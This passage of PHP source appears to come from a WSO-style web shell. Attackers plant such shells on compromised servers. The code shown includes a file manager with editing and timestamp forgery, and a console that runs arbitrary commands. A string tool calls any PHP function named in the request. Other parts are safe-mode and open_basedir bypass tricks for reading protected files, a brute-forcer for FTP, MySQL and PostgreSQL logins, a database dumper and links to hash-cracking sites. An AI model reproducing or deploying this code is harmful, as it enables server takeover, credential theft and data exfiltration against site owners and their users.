 600         elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) 
 601             $links[] = array_merge($tmp, array('type' => 'link')); 
 602         elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) 
 603             $dirs[] = array_merge($tmp, array('type' => 'dir')); 
 604     } 
 605     $GLOBALS['sort'] = $sort; 
 606     function cmp($a, $b) { 
 607         if($GLOBALS['sort'][0] != 'size') 
 608             return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1); 
 609         else 
 610             return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); 
 611     } 
 612     usort($files, "cmp"); 
 613     usort($dirs, "cmp"); 
 614     usort($links, "cmp"); 
 615     $files = array_merge($dirs, $links, $files); 
 616     $l = 0; 
 617     foreach($files as $f) { 
 618         echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] 
 619             .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>'; 
 620         $l = $l?0:1; 
 621     } 
 622     ?> 
 623     <tr><td colspan=7> 
 624     <input type=hidden name=a value='FilesMan'> 
 625     <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
 626     <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
 627     <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr> 
 628     </form></table></div> 
 629     <?php 
 630     printFooter(); 
 631 } 
 632 
 633 function actionStringTools() { 
 634     if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} 
 635     if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} 
 636     if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}} 
 637     if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} 
 638      
 639     if(isset($_POST['ajax'])) { 
 640         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
 641         ob_start(); 
 642         if(function_exists($_POST['p1'])) 
 643             echo $_POST['p1']($_POST['p2']); 
 644         $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'&#92;&#48;")."';\n"; 
 645         echo strlen($temp), "\n", $temp; 
 646         exit; 
 647     } 
 648     printHeader(); 
 649     echo '<h1>String conversions</h1><div class=content>'; 
 650     $stringTools = array( 
 651         'Base64 encode' => 'base64_encode', 
 652         'Base64 decode' => 'base64_decode', 
 653         'Url encode' => 'urlencode', 
 654         'Url decode' => 'urldecode', 
 655         'Full urlencode' => 'full_urlencode', 
 656         'md5 hash' => 'md5', 
 657         'sha1 hash' => 'sha1', 
 658         'crypt' => 'crypt', 
 659         'CRC32' => 'crc32', 
 660         'ASCII to HEX' => 'ascii2hex', 
 661         'HEX to ASCII' => 'hex2ascii', 
 662         'HEX to DEC' => 'hexdec', 
 663         'HEX to BIN' => 'hex2bin', 
 664         'DEC to HEX' => 'dechex', 
 665         'DEC to BIN' => 'decbin', 
 666         'BIN to HEX' => 'bin2hex', 
 667         'BIN to DEC' => 'bindec',         
 668         'String to lower case' => 'strtolower', 
 669         'String to upper case' => 'strtoupper', 
 670         'Htmlspecialchars' => 'htmlspecialchars', 
 671         'String length' => 'strlen', 
 672     ); 
 673     if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
 674         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
 675     echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; 
 676     foreach($stringTools as $k => $v) 
 677         echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; 
 678         echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; 
 679     if(!empty($_POST['p1'])) { 
 680         if(function_exists($_POST['p1'])) 
 681         echo htmlspecialchars($_POST['p1']($_POST['p2'])); 
 682     } 
 683     echo"</pre></div>"; 
 684     ?> 
 685     <br><h1>Search for hash:</h1><div class=content> 
 686         <form method='post' target='_blank' name="hf"> 
 687             <input type="text" name="hash" style="width:200px;"><br> 
 688             <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()"><br> 
 689             <input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()"><br> 
 690             <input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()"><br> 
 691             <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br> 
 692             <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()"><br> 
 693         </form> 
 694     </div> 
 695     <?php 
 696     printFooter(); 
 697 } 
 698 
 699 function actionFilesTools() { 
 700     if( isset($_POST['p1']) ) 
 701         $_POST['p1'] = urldecode($_POST['p1']); 
 702     if(@$_POST['p2']=='download') { 
 703         if(is_file($_POST['p1']) && is_readable($_POST['p1'])) { 
 704             ob_start("ob_gzhandler", 4096); 
 705             header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); 
 706             if (function_exists("mime_content_type")) { 
 707                 $type = @mime_content_type($_POST['p1']); 
 708                 header("Content-Type: ".$type); 
 709             } 
 710             $fp = @fopen($_POST['p1'], "r"); 
 711             if($fp) { 
 712                 while(!@feof($fp)) 
 713                     echo @fread($fp, 1024); 
 714                 fclose($fp); 
 715             } 
 716         } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) { 
 717 
 718         } 
 719         exit; 
 720     } 
 721     if( @$_POST['p2'] == 'mkfile' ) { 
 722         if(!file_exists($_POST['p1'])) { 
 723             $fp = @fopen($_POST['p1'], 'w'); 
 724             if($fp) { 
 725                 $_POST['p2'] = "edit"; 
 726                 fclose($fp); 
 727             } 
 728         } 
 729     } 
 730     printHeader(); 
 731     echo '<h1>File tools</h1><div class=content>'; 
 732     if( !file_exists(@$_POST['p1']) ) { 
 733         echo 'File not exists'; 
 734         printFooter(); 
 735         return; 
 736     } 
 737     $uid = @posix_getpwuid(@fileowner($_POST['p1'])); 
 738     $gid = @posix_getgrgid(@fileowner($_POST['p1'])); 
 739     echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; 
 740     echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; 
 741     if( empty($_POST['p2']) ) 
 742         $_POST['p2'] = 'view'; 
 743     if( is_file($_POST['p1']) ) 
 744         $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); 
 745     else 
 746         $m = array('Chmod', 'Rename', 'Touch'); 
 747     foreach($m as $v) 
 748         echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; 
 749     echo '<br><br>'; 
 750     switch($_POST['p2']) { 
 751         case 'view': 
 752             echo '<pre class=ml1>'; 
 753             $fp = @fopen($_POST['p1'], 'r'); 
 754             if($fp) { 
 755                 while( !@feof($fp) ) 
 756                     echo htmlspecialchars(@fread($fp, 1024)); 
 757                 @fclose($fp); 
 758             } 
 759             echo '</pre>'; 
 760             break; 
 761         case 'highlight': 
 762             if( is_readable($_POST['p1']) ) { 
 763                 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; 
 764                 $code = highlight_file($_POST['p1'],true); 
 765                 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; 
 766             } 
 767             break; 
 768         case 'chmod': 
 769             if( !empty($_POST['p3']) ) { 
 770                 $perms = 0; 
 771                 for($i=strlen($_POST['p3'])-1;$i>=0;--$i) 
 772                     $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); 
 773                 if(!@chmod($_POST['p1'], $perms)) 
 774                     echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; 
 775                 else 
 776                     die('<script>g(null,null,null,null,"")</script>'); 
 777             } 
 778             echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; 
 779             break; 
 780         case 'edit': 
 781             if( !is_writable($_POST['p1'])) { 
 782                 echo 'File isn\'t writeable'; 
 783                 break; 
 784             } 
 785             if( !empty($_POST['p3']) ) { 
 786                 @file_put_contents($_POST['p1'],$_POST['p3']); 
 787                 echo 'Saved!<br><script>document.mf.p3.value="";</script>'; 
 788             } 
 789             echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>'; 
 790             $fp = @fopen($_POST['p1'], 'r'); 
 791             if($fp) { 
 792                 while( !@feof($fp) ) 
 793                     echo htmlspecialchars(@fread($fp, 1024)); 
 794                 @fclose($fp); 
 795             } 
 796             echo '</textarea><input type=submit value=">>"></form>'; 
 797             break; 
 798         case 'hexdump': 
 799             $c = @file_get_contents($_POST['p1']); 
 800             $n = 0; 
 801             $h = array('00000000<br>','',''); 
 802             $len = strlen($c); 
 803             for ($i=0; $i<$len; ++$i) { 
 804                 $h[1] .= sprintf('%02X',ord($c[$i])).' '; 
 805                 switch ( ord($c[$i]) ) { 
 806                     case 0:  $h[2] .= ' '; break; 
 807                     case 9:  $h[2] .= ' '; break; 
 808                     case 10: $h[2] .= ' '; break; 
 809                     case 13: $h[2] .= ' '; break; 
 810                     default: $h[2] .= $c[$i]; break; 
 811                 } 
 812                 $n++; 
 813                 if ($n == 32) { 
 814                     $n = 0; 
 815                     if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} 
 816                     $h[1] .= '<br>'; 
 817                     $h[2] .= "\n"; 
 818                 } 
 819              } 
 820             echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; 
 821             break; 
 822         case 'rename': 
 823             if( !empty($_POST['p3']) ) { 
 824                 if(!@rename($_POST['p1'], $_POST['p3'])) 
 825                     echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>'; 
 826                 else 
 827                     die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); 
 828             } 
 829             echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; 
 830             break; 
 831         case 'touch': 
 832             if( !empty($_POST['p3']) ) { 
 833                 $time = strtotime($_POST['p3']); 
 834                 if($time) { 
 835                     if(@touch($_POST['p1'],$time,$time)) 
 836                         die('<script>g(null,null,null,null,"")</script>'); 
 837                     else { 
 838                         echo 'Fail!<script>document.mf.p3.value="";</script>'; 
 839                     } 
 840                 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>'; 
 841             } 
 842             echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; 
 843             break; 
 844         case 'mkfile': 
 845              
 846             break; 
 847     } 
 848     echo '</div>'; 
 849     printFooter(); 
 850 } 
 851 
 852 function actionSafeMode() { 
 853     $temp=''; 
 854     ob_start(); 
 855     switch($_POST['p1']) { 
 856         case 1: 
 857             $temp=@tempnam($test, 'cx'); 
 858             if(@copy("compress.zlib://".$_POST['p2'], $temp)){ 
 859                 echo @file_get_contents($temp); 
 860                 unlink($temp); 
 861             } else 
 862                 echo 'Sorry... Can\'t open file'; 
 863             break; 
 864         case 2: 
 865             $files = glob($_POST['p2'].'*'); 
 866             if( is_array($files) ) 
 867                 foreach ($files as $filename) 
 868                     echo $filename."\n"; 
 869             break; 
 870         case 3: 
 871             $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); 
 872             curl_exec($ch); 
 873             break; 
 874         case 4: 
 875             ini_restore("safe_mode"); 
 876             ini_restore("open_basedir"); 
 877             include($_POST['p2']); 
 878             break; 
 879         case 5: 
 880             for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { 
 881                 $uid = @posix_getpwuid($_POST['p2']); 
 882                 if ($uid) 
 883                     echo join(':',$uid)."\n"; 
 884             } 
 885             break; 
 886         case 6: 
 887             if(!function_exists('imap_open'))break; 
 888             $stream = imap_open($_POST['p2'], "", ""); 
 889             if ($stream == FALSE) 
 890                 break; 
 891             echo imap_body($stream, 1); 
 892             imap_close($stream); 
 893             break; 
 894     } 
 895     $temp = ob_get_clean(); 
 896     printHeader(); 
 897     echo '<h1>Safe mode bypass</h1><div class=content>'; 
 898     echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; 
 899     if($temp) 
 900         echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; 
 901     echo '</div>'; 
 902     printFooter(); 
 903 } 
 904 
 905 function actionConsole() { 
 906     if(isset($_POST['ajax'])) { 
 907         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
 908         ob_start(); 
 909         echo "document.cf.cmd.value='';\n"; 
 910         $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'&#92;&#48;")); 
 911         if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    { 
 912             if(@chdir($match[1])) { 
 913                 $GLOBALS['cwd'] = @getcwd(); 
 914                 echo "document.mf.c.value='".$GLOBALS['cwd']."';"; 
 915             } 
 916         } 
 917         echo "document.cf.output.value+='".$temp."';"; 
 918         echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; 
 919         $temp = ob_get_clean(); 
 920         echo strlen($temp), "\n", $temp; 
 921         exit; 
 922     } 
 923     printHeader(); 
 924 ?> 
 925 <script> 
 926 if(window.Event) window.captureEvents(Event.KEYDOWN); 
 927 var cmds = new Array(""); 
 928 var cur = 0; 
 929 function kp(e) { 
 930     var n = (window.Event) ? e.which : e.keyCode; 
 931     if(n == 38) { 
 932         cur--; 
 933         if(cur>=0) 
 934             document.cf.cmd.value = cmds[cur]; 
 935         else 
 936             cur++; 
 937     } else if(n == 40) { 
 938         cur++; 
 939         if(cur < cmds.length) 
 940             document.cf.cmd.value = cmds[cur]; 
 941         else 
 942             cur--; 
 943     } 
 944 } 
 945 function add(cmd) { 
 946     cmds.pop(); 
 947     cmds.push(cmd); 
 948     cmds.push(""); 
 949     cur = cmds.length-1; 
 950 } 
 951 </script> 
 952 <?php 
 953     echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>'; 
 954     foreach($GLOBALS['aliases'] as $n => $v) { 
 955         if($v == '') { 
 956             echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; 
 957             continue; 
 958         } 
 959         echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; 
 960     } 
 961     if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
 962         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
 963     echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; 
 964     if(!empty($_POST['p1'])) { 
 965         echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); 
 966     } 
 967     echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">'; 
 968     echo '</form></div><script>document.cf.cmd.focus();</script>'; 
 969     printFooter(); 
 970 } 
 971 
 972 function actionLogout() { 
 973     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 
 974     echo 'bye!'; 
 975 } 
 976 
 977 function actionSelfRemove() { 
 978     printHeader(); 
 979     if($_POST['p1'] == 'yes') { 
 980         if(@unlink(SELF_PATH)) 
 981             die('Shell has been removed'); 
 982         else 
 983             echo 'unlink error!'; 
 984     } 
 985     echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; 
 986     printFooter(); 
 987 } 
 988 
 989 function actionBruteforce() { 
 990     printHeader(); 
 991     if( isset($_POST['proto']) ) { 
 992         echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; 
 993         if( $_POST['proto'] == 'ftp' ) { 
 994             function bruteForce($ip,$port,$login,$pass) { 
 995                 $fp = @ftp_connect($ip, $port?$port:21); 
 996                 if(!$fp) return false; 
 997                 $res = @ftp_login($fp, $login, $pass); 
 998                 @ftp_close($fp); 
 999                 return $res; 
1000             } 
1001         } elseif( $_POST['proto'] == 'mysql' ) { 
1002             function bruteForce($ip,$port,$login,$pass) { 
1003                 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); 
1004                 @mysql_close($res); 
1005                 return $res; 
1006             } 
1007         } elseif( $_POST['proto'] == 'pgsql' ) { 
1008             function bruteForce($ip,$port,$login,$pass) { 
1009                 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''"; 
1010                 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass); 
1011                 @pg_close($res); 
1012                 return $res; 
1013             } 
1014         } 
1015         $success = 0; 
1016         $attempts = 0; 
1017         $server = explode(":", $_POST['server']); 
1018         if($_POST['type'] == 1) { 
1019             $temp = @file('/etc/passwd'); 
1020             if( is_array($temp) ) 
1021                 foreach($temp as $line) { 
1022                     $line = explode(":", $line); 
1023                     ++$attempts; 
1024                     if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { 
1025                         $success++; 
1026                         echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; 
1027                     } 
1028                     if(@$_POST['reverse']) { 
1029                         $tmp = ""; 
1030                         for($i=strlen($line[0])-1; $i>=0; --$i) 
1031                             $tmp .= $line[0][$i]; 
1032                         ++$attempts; 
1033                         if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { 
1034                             $success++; 
1035                             echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); 
1036                         } 
1037                     } 
1038                 } 
1039         } elseif($_POST['type'] == 2) { 
1040             $temp = @file($_POST['dict']); 
1041             if( is_array($temp) ) 
1042                 foreach($temp as $line) { 
1043                     $line = trim($line); 
1044                     ++$attempts; 
1045                     if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { 
1046                         $success++; 
1047                         echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; 
1048                     } 
1049                 } 
1050         } 
1051         echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; 
1052     } 
1053     echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' 
1054         .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' 
1055         .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' 
1056         .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' 
1057         .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' 
1058         .'<span>Server:port</span></td>' 
1059         .'<td><input type=text name=server value="127.0.0.1"></td></tr>' 
1060         .'<tr><td><span>Brute type</span></td>' 
1061         .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' 
1062         .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' 
1063         .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' 
1064         .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' 
1065         .'<td><input type=text name=login value="komsen"></td></tr>' 
1066         .'<tr><td><span>Dictionary</span></td>' 
1067         .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' 
1068         .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; 
1069     echo '</div><br>'; 
1070     printFooter(); 
1071 } 
1072 
1073 function actionSql() { 
1074     class DbClass { 
1075         var $type; 
1076         var $link; 
1077         var $res; 
1078         function DbClass($type)    { 
1079             $this->type = $type; 
1080         } 
1081         function connect($host, $user, $pass, $dbname){ 
1082             switch($this->type)    { 
1083                 case 'mysql': 
1084                     if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; 
1085                     break; 
1086                 case 'pgsql': 
1087                     $host = explode(':', $host); 
1088                     if(!$host[1]) $host[1]=5432; 
1089                     if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; 
1090                     break; 
1091             } 
1092             return false; 
1093         } 
1094         function selectdb($db) { 
1095             switch($this->type)    { 
1096                 case 'mysql': 
1097                     if (@mysql_select_db($db))return true; 
1098                     break; 
1099             } 
1100             return false; 
1101         } 
1102         function query($str) { 
1103             switch($this->type) { 
1104                 case 'mysql': 
1105                     return $this->res = @mysql_query($str); 
1106                     break; 
1107                 case 'pgsql': 
1108                     return $this->res = @pg_query($this->link,$str); 
1109                     break; 
1110             } 
1111             return false; 
1112         } 
1113         function fetch() { 
1114             $res = func_num_args()?func_get_arg(0):$this->res; 
1115             switch($this->type)    { 
1116                 case 'mysql': 
1117                     return @mysql_fetch_assoc($res); 
1118                     break; 
1119                 case 'pgsql': 
1120                     return @pg_fetch_assoc($res); 
1121                     break; 
1122             } 
1123             return false; 
1124         } 
1125         function listDbs() { 
1126             switch($this->type)    { 
1127                 case 'mysql': 
1128                     return $this->res = @mysql_list_dbs($this->link); 
1129                 break; 
1130                 case 'pgsql': 
1131                     return $this->res = $this->query("SELECT datname FROM pg_database"); 
1132                 break; 
1133             } 
1134             return false; 
1135         } 
1136         function listTables() { 
1137             switch($this->type)    { 
1138                 case 'mysql': 
1139                     return $this->res = $this->query('SHOW TABLES'); 
1140                 break; 
1141                 case 'pgsql': 
1142                     return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'"); 
1143                 break; 
1144             } 
1145             return false; 
1146         } 
1147         function error() { 
1148             switch($this->type)    { 
1149                 case 'mysql': 
1150                     return @mysql_error($this->link); 
1151                 break; 
1152                 case 'pgsql': 
1153                     return @pg_last_error($this->link); 
1154                 break; 
1155             } 
1156             return false; 
1157         } 
1158         function setCharset($str) { 
1159             switch($this->type)    { 
1160                 case 'mysql': 
1161                     if(function_exists('mysql_set_charset')) 
1162                         return @mysql_set_charset($str, $this->link); 
1163                     else 
1164                         $this->query('SET CHARSET '.$str); 
1165                     break; 
1166                 case 'mysql': 
1167                     return @pg_set_client_encoding($this->link, $str); 
1168                     break; 
1169             } 
1170             return false; 
1171         } 
1172         function dump($table) { 
1173             switch($this->type)    { 
1174                 case 'mysql': 
1175                     $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); 
1176                     $create = mysql_fetch_array($res); 
1177                     echo $create[1].";\n\n"; 
1178                     $this->query('SELECT * FROM `'.$table.'`'); 
1179                     while($item = $this->fetch()) { 
1180                         $columns = array(); 
1181                         foreach($item as $k=>$v) { 
1182                             $item[$k] = "'".@mysql_real_escape_string($v)."'"; 
1183                             $columns[] = "`".$k."`"; 
1184                         } 
1185                     echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; 
1186                     } 
1187                 break; 
1188                 case 'pgsql': 
1189                     $this->query('SELECT * FROM '.$table); 
1190                     while($item = $this->fetch()) { 
1191                         $columns = array(); 
1192                         foreach($item as $k=>$v) { 
1193                             $item[$k] = "'".addslashes($v)."'"; 
1194                             $columns[] = $k; 
1195                         } 
1196                     echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; 
1197                     } 
1198                 break; 
1199             } 
1200             return false; 
1201         } 
1202     }; 
1203     $db = new DbClass($_POST['type']); 
1204     if(@$_POST['p2']=='download') { 
1205         ob_start("ob_gzhandler", 4096); 
1206         $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); 
1207         $db->selectdb($_POST['sql_base']); 
1208         header("Content-Disposition: attachment; filename=dump.sql"); 
1209         header("Content-Type: text/plain"); 
1210         foreach($_POST['tbl'] as $v) 
1211                 $db->dump($v); 
1212         exit; 
1213     } 
1214     printHeader(); 
1215     ?> 
1216     <h1>Sql browser</h1><div class=content> 
1217     <form name="sf" method="post"> 
1218         <table cellpadding="2" cellspacing="0"> 
1219             <tr> 
1220                 <td>Type</td> 
1221                 <td>Host</td> 
1222                 <td>Login</td> 
1223                 <td>Password</td> 
1224                 <td>Database</td> 
1225                 <td></td> 
1226             </tr> 
1227             <tr> 
1228                 <input type=hidden name=a value=Sql> 
1229                 <input type=hidden name=p1 value='query'> 
1230                 <input type=hidden name=p2> 
1231                 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'> 
1232                 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
1233                 <td> 
1234                     <select name='type'> 
1235                         <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option> 
1236                         <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option> 
1237                     </select></td> 
1238                 <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td> 
1239                 <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td> 
1240                 <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td> 
1241                 <td> 
1242     <?php 
